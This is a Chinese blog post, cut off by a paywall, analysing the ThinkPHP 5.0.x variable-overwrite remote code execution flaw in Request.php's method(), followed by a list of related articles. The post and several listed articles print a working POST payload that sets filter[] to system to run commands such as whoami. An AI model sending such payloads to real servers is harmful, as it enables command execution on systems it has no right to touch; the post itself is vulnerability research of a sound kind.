[代码审计]ThinkPHP 5.0.x 变量覆盖导致的RCE分析

最新推荐文章于 2024-05-03 11:33:53 发布
最新推荐文章于 2024-05-03 11:33:53 发布
阅读量5.4k 收藏 2
点赞数 9
分类专栏: 代码审计 文章标签: php web安全 渗透 thinkphp 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/121413362
版权

前言

漏洞存在版本,分为两大版本:

  • ThinkPHP 5.0-5.0.24

  • ThinkPHP 5.1.0-5.1.30

环境搭建

composer create-project topthink/think=5.0.5 thinkphp5.0.5  --prefer-dist

修改composer.json

"require": {
    "php": ">=5.4.0",
    "topthink/framework": "5.0.5"
},

执行composer update
访问public/index.php
在这里插入图片描述

漏洞分析

payload:

_method=__construct&method=get&filter[]=system&get[]=whoami

在thinkphp/library/think/Request.php中的method方法里面

public function method($method = false)
    {
   
        if (true === $method) {
   
            // 获取原始请求类型
            return IS_CLI ? 'GET' : (isset($this->server['REQUEST_METHOD']) ? $this->server['REQUEST_METHOD'] : $_SERVER['REQUEST_METHOD']);
        } elseif (!$this->method) {
   
            if (isset($_POST[Config::get('var_method')])) {
   
                $this->method = strtoupper($_POST[Config::get('var_method')]);
                $this->{
   $this->method}($_POST);
            }
最低0.47元/天 解锁文章
huamanggg
关注
  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
ThinkPHP5.0.5_变量覆盖导致RCE漏洞分析
11-21 1426
TP5.0.5_变量覆盖导致RCE漏洞分析 TP的RCE漏洞有两个大版本的区别 TP 5.0-5.0.24 这个RCE5.0.13之后的版本需要开启debug模式 TP 5.1.0-5.1.30 POChttp://localhost:8009/public/index.php POST: _method=__construct&method=GET&filter[]=system&s=whoami 漏洞分析 在经过App::routeCheck()->Ro
thinkphp5.0.x RCE
fmyyy1的博客
07-28 573
ThinkPHP 5.0.x (<=5.0.23) 5.0.23->5.0.24 对method方法添加了过滤,该方法为获取请求类型,5.0.24中只允许method为常用的几个方法,否则就将其置为POST方法。 在/thinkphp/library/think/Request.php下的filterValue函数下的第五行,调用了call_user_func()方法 private function filterValue(&$value, $key, $filters)
ThinkPHP--5.0.23-rce远程代码执行
最新发布
m0_74402888的博客
05-03 552
实现框架的核心类Requests的method方法实现表单请求类伪装,默认为$_POST[‘_method’]变量,却没有对_method属性进行严格校验,可以通过变量覆盖Requests类的属性,在结合框架特性实现对任意函数的调用实现任意代码执行。攻击者可向缓存文件内写入PHP代码,导致远程代码执行。
ThinkPHP5.0.5RCE
1stPeak's Blog
08-06 886
访问 http://xx.xx.xx.xx:8080/index.php/?s=captcha payload: _method=__construct&filter[]=system&method=GET&get[]=系统命令 示例如下: post传入_method=__construct&filter[]=system&method=GET&get[]=whoami进行命令执行 post传入_method=__construct&filter
ThinkPHP5 Request类method任意方法调用RCE
weixin_43610673的博客
01-24 1437
此时的调用链如下,由array_walk_recursive调用filterValue函数,完成命令执行。从上面可以看到,filter变量清除在module分支中完成的,通过进入其他进行绕过分支。此时的触发点位于记录路由和请求信息的部分,这也是为什么需要开启debug选项。5.0.13版本之前无需开启debug就能rce,之前的版本中下图代码不会在。中重新再设置一次默认filter,这就会覆盖传入的恶意filter类属性。之前的版本仅在路由调度之前进行设置filter,的键名同名的类属性赋值为。
PHPrce函数,Thinkphp5-1-2-RCE简单分析
weixin_30332165的博客
04-12 432
前言上次出的洞是接近元旦吧,好像刚从南京回学校,要准备烦人的期末,没心思分析,前天我刚考完,今天刚爆的洞洞貌似。然后自己跟着调试了一下。漏洞细节这是复现图前提是要在index.php中禁止报错,其实在生产环境中,开发也会这么做。漏洞点在\thinkphp\library\think\Request.php中的method函数:public function method($origin = fal...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
thinkphp5.0.rar
09-29
本压缩包包含了官方提供的三本重要手册,分别是《ThinkPHP5快速入门》、《ThinkPHP5.0完全开发手册》以及《ThinkPHP5控制器从入门到精通》,另外还附带了一个名为"thinkphp.txt"的文本文件,可能是框架的一些基础...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE...
thinkphp5.0.rar.rar
10-08
2. **目录结构**:解压后的"thinkphp5.0.rar"会展示ThinkPHP5.0的标准目录结构,包括public、application、runtime、vendor等目录,每个目录都有特定的功能,如public作为Web访问入口,application存放应用代码,...
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
学习笔记-ThinkPHP5之任意方法调用RCE(六)
人饭子的博客
11-09 438
书接上文 利用method的任意方法调用,调用构造函数__construct,且调用时会传入$_POST数据,那么组合起来就是执行method方法可以控制类的成员变量的值。 filterValue中存在 call_user_func函数可以恶意利用,关注其参数$filters是否可控。 getFilter方法存在这样$filter = $filter ?: $this->filter;...
Thinkphp5.0.23 rce(远程代码执行)的漏洞复现
热门推荐
陈瘦瘦的迪迦的博客
12-08 1万+
Thinkphp5.0.23 rce(远程代码执行)的漏洞复现 漏洞形成原因 框架介绍: ThinkPHP是一款运用极广的PHP开发框架。 漏洞引入: 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 漏洞如何利用 1、访问靶机地址+端口号 进入首页 2、Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&meth
thinkphp5 RCE漏洞复现
feng的博客
03-03 3409
前言 之前看的是tp3的SQL注入,现在开始审计一下tp5的一些SQL注入和RCE。先看一下RCE,毕竟thinkphp最广为人知的漏洞就是RCE。 首先是源码的下载,我从这里下载: thinkphp下载 这里我下载的是thinkphp5.0.22完整版,如果下载核心版的话可能会有一些代码的缺失。 debug模式开启下的RCE 和之前tp5.1的反序列化一样,RCE的执行点也都是重要的request类。关键在于这个filterValue()函数: /** * 递归过滤给定的值 * @param mixe
ThinkPHP V5的RCE(远程代码执行漏洞)
Home to come
04-18 2099
一、Shell脚本基础知识 1.Shell 输入/输出重定向 常见重定向符号: 1)标准输出 > 覆盖重定向 set -C 关闭覆盖重定向的功能 set +C:恢复 >| 强制重定向 >> 追加重定向 2)标准输入 < a<b :把b交给a执行 tr 替换文件内容(tr set1 [set2])char(字符:一个...
Thinkphp 5.0.24变量覆盖漏洞导致RCE分析
bhegi_seg的博客
07-31 1004
好了,回到正题,继续跟进到877行,
thinkphp5.x系列 RCE总结
weixin_30672019的博客
05-11 2822
Thinkphp MVC开发模式 执行流程: 首先发起请求->开始路由检测->获取pathinfo信息->路由匹配->开始路由解析->获得模块、控制器、操作方法调度信息->开始路由调度->解析模块和类名->组建命名空间>查找并加载类->实例化控制器并调用操作方法->构建响应对象->响应输出->日志保存->程序...
Thinkphp5.0.2Rce分析
lastwinn的博客
07-06 2230
记录自己的所学以及理解。
thinkphp3.2.x rce
12-18
ThinkPHP是一个开源的PHP开发框架,它的版本3.2.x是一个老版本,存在远程命令执行(RCE)漏洞。这个漏洞允许攻击者通过构造恶意请求来执行任意的系统命令,从而获得对应用服务器的完全控制权限。 这个漏洞的原因是在ThinkPHP 3.2.x版本的核心代码中没有对用户的输入进行充分的过滤和校验。攻击者可以利用这个漏洞来执行各种恶意操作,比如上传恶意文件、修改数据库内容或者获取系统敏感信息等。 为了利用这个漏洞,攻击者需要构造一个特殊的请求,其中包含可执行的系统命令。然后将这个请求发送到受影响的应用程序的漏洞点上。当应用程序在处理这个请求时,会将其中的系统命令当作可执行代码来执行,最终导致攻击者获取对应用服务器的控制权限。 为了修复这个漏洞,用户可以升级到最新版本的ThinkPHP框架。在最新版本中,开发者已经修复了这个漏洞,并加强了对用户输入的过滤和校验。此外,用户还可以根据自己的需求对应用程序进行进一步的安全加固,比如限制上传文件的类型和大小,对用户输入进行严格的过滤和校验等。 总之,ThinkPHP 3.2.x版本存在远程命令执行漏洞,攻击者可以通过构造恶意请求来执行任意的系统命令。为了修复这个漏洞,用户可以升级到最新版本的ThinkPHP框架,并加强应用程序的安全加固措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值